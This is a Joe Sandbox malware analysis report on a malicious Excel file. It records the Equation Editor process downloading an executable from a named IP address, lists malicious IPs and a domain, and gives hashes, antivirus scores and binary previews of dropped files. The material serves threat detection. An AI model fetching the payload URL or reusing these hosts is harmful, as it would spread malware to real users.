                  http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drfalse
                    		high
                    http://www.ibsensoftware.com/xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    198.46.132.195
                    		unknownUnited States
                    		36352AS-COLOCROSSINGUStrue
                    104.21.49.244
                    		unknownUnited States
                    		13335CLOUDFLARENETUStrue
                    172.67.197.66
                    		asiaoil.barUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:569962
                    Start date:10.02.2022
                    Start time:10:20:40
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 9m 3s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:_2201S_BUSAN_HOCHIMINH_.xlsx
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 72.4% (good quality ratio 69.6%)
                    • Quality average: 78.5%
                    • Quality standard deviation: 27.9%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:21:38API Interceptor50x Sleep call for process: EQNEDT32.EXE modified
                    10:21:47API Interceptor771x Sleep call for process: xmtxpy.exe modified

                    Joe Sandbox View / Context

                    IPs

                    No context

                    Domains

                    No context

                    ASNs

                    No context

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                    Category:downloaded
                    Size (bytes):295124
                    Entropy (8bit):7.944502610174892
                    Encrypted:false
                    SSDEEP:6144:ow2pJekU4t1+9AJci0mJVmkzcOsggBk4u9aTTozAlJixJFfDqXR0e:eJekU4zuAJv0mupOtWu9aIcTR0e
                    MD5:7DF1896047D9647D818080DD17563D92
                    SHA1:A7C2BC04EC70C0F439E2A0863096FA7D391F79C5
                    SHA-256:9CBED5EFF56E1C08B6040C8AB4977E76528D59368D9D0550626B5380513ECB7B
                    SHA-512:1558B4573F82B4B6F34E96591A5A4CF4533C30BEC9D65C3BC1435FEB0119F23EB91E5C7E771D58F502199BB3CDE272C3135CD8A8F3944D87E8759D23A340D01D
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 21%, Browse
                    • Antivirus: ReversingLabs, Detection: 23%
                    Reputation:low
                    IE Cache URL:http://198.46.132.195/windowSSH/.win32.exe
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1582FF20.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):3747
                    Entropy (8bit):7.932023348968795
                    Encrypted:false
                    SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                    MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                    SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                    SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                    SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3E8BE616.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):3747
                    Entropy (8bit):7.932023348968795
                    Encrypted:false
                    SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                    MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                    SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                    SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                    SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emf

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):1099960
                    Entropy (8bit):2.015315240232208
                    Encrypted:false
                    SSDEEP:3072:gXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:OahIFdyiaT2qtXl
                    MD5:15A27F5C7EF8F89145A89ECF451B90D4
                    SHA1:EC1F1BCB1324FDBB9FAE80EF1003B57D727100F4
                    SHA-256:637B6C47252552D5DBD483BDD47DE9BCB5B041AB0EECBF523FDC0145D8154213
                    SHA-512:78BBBD3DBB637F7BEE3724CEADAFFD362567A951EF9374F1E8398B9C37E0C7A1ECB74BAB56B9B331AC0F524E8E97658BC0625238F2EF383F51420FBFC8EABD22
                    Malicious:false
                    Reputation:low
                    Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................W$...x.O..f.W.@..%...T.O...O.......O.|.O.RQ.X..O...O.....d.O...O.$Q.X..O...O. ...Id.W..O...O. .........O..d.W............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i.............O.X.....O.(.O..8.W......O.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\611F4629.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):10202
                    Entropy (8bit):7.870143202588524
                    Encrypted:false
                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                    Malicious:false
                    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\62ED731F.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):2647
                    Entropy (8bit):7.8900124483490135
                    Encrypted:false
                    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                    MD5:E46357D82EBC866EEBDA98FA8F94B385
                    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                    Malicious:false
                    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\902EBCC8.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):11303
                    Entropy (8bit):7.909402464702408
                    Encrypted:false
                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                    Malicious:false
                    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92A0FADB.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):10202
                    Entropy (8bit):7.870143202588524
                    Encrypted:false
                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                    Malicious:false
                    Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C018985.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):5396
                    Entropy (8bit):7.915293088075047
                    Encrypted:false
                    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                    Malicious:false
                    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D560E8D.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):2647
                    Entropy (8bit):7.8900124483490135
                    Encrypted:false
                    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                    MD5:E46357D82EBC866EEBDA98FA8F94B385
                    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                    Malicious:false
                    Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4FBAD23.png

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):5396
                    Entropy (8bit):7.915293088075047
                    Encrypted:false
                    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                    Malicious:false
                    Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B2EFEB2A.jpeg

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                    Category:dropped
                    Size (bytes):4396
                    Entropy (8bit):7.884233298494423
                    Encrypted:false
                    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                    Malicious:false
                    Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFF43294.jpeg

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                    Category:dropped
                    Size (bytes):4396
                    Entropy (8bit):7.884233298494423
                    Encrypted:false
                    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                    Malicious:false
